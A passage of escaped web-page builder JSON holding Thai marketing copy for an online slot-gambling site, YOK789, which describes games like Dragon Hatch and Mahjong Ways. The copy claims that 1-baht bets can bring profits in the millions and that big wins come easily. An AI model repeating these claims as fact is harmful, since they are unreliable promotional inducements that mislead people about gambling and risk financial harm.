\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e23\\u0e48\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e19\\u0e30 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e01\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e37\\u0e19\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Dragon Hatc<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Dragon Hatch \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e22\\u0e34\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e27\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e21\\u0e32\\u0e40\\u0e15\\u0e34\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e43\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e43\\u0e1a\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e32\\u0e14\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e17\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e44\\u0e1f\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e04\\u0e33\\u0e23\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1b\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e19\\u0e31\\u0e01\\u0e25\\u0e48\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e37\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1e\\u0e35\\u0e04\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e1e\\u0e25\\u0e34\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e08\\u0e30\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e04\\u0e37\\u0e2d\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 YOK789 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e23\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19 \\u0e46 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e15\\u0e39\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e15\\u0e48\\u0e28\\u0e31\\u0e01\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e44\\u0e14\\u0e49\\u0e44\\u0e01\\u0e25\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e04\\u0e31\\u0e14\\u0e21\\u0e32\\u0e40\\u0e19\\u0e49\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07\\u0e01\\u0e47\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e44\\u0e25\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e16\\u0e39\\u0e01\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e23\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1f\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e41\\u0e15\\u0e48\\u0e43\\u0e0a\\u0e49\\u0e01\\u0e32\\u0e23\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e04\\u0e27\\u0e1a\\u0e04\\u0e39\\u0e48\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e25\\u0e47\\u0e01\\u0e41\\u0e15\\u0e48\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e43\\u0e19\\u0e42\\u0e25\\u0e01\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 YOK \\u0e22\\u0e01\\u0e15\\u0e31\\u0e27\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19 \\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 <\\/span><b>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17<\\/b> <span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 \\u0e21\\u0e35\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e19\\u0e27\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e40\\u0e01\\u0e21\\u0e18\\u0e35\\u0e21\\u0e2a\\u0e21\\u0e1a\\u0e31\\u0e15\\u0e34\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e21\\u0e31\\u0e01\\u0e21\\u0e35\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e01\\u0e47\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e25\\u0e44\\u0e21\\u0e49\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e44\\u0e14\\u0e49\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e21\\u0e49\\u0e15\\u0e31\\u0e49\\u0e07\\u0e40\\u0e1a\\u0e17\\u0e15\\u0e48\\u0e33\\u0e01\\u0e47\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e1a\\u0e17\\u0e2a\\u0e39\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e08\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32 \\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e23\\u0e07\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e15\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e01\\u0e47\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1a\\u0e17\\u0e40\\u0e1a\\u0e32\\u0e41\\u0e15\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Mahjong Ways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Mahjong Ways \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e44\\u0e1e\\u0e48\\u0e19\\u0e01\\u0e01\\u0e23\\u0e30\\u0e08\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e15\\u0e01\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e2b\\u0e25\\u0e22\\u0e32\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e2d\\u0e21\\u0e42\\u0e1a \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e08\\u0e35\\u0e19\\u0e42\\u0e1a\\u0e23\\u0e32\\u0e13\\u0e14\\u0e39\\u0e41\\u0e1e\\u0e07\\u0e41\\u0e15\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e01\\u0e21\\u0e44\\u0e21\\u0e48\\u0e40\\u0e23\\u0e47\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b\\u0e08\\u0e36\\u0e07\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e14\\u0e39\\u0e17\\u0e23\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e34\\u0e14\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e15\\u0e31\\u0e27 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e1b\\u0e34\\u0e14\\u0e08\\u0e1a\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e19\\u0e31\\u0e01 \\u0e46 \\u0e08\\u0e30\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07 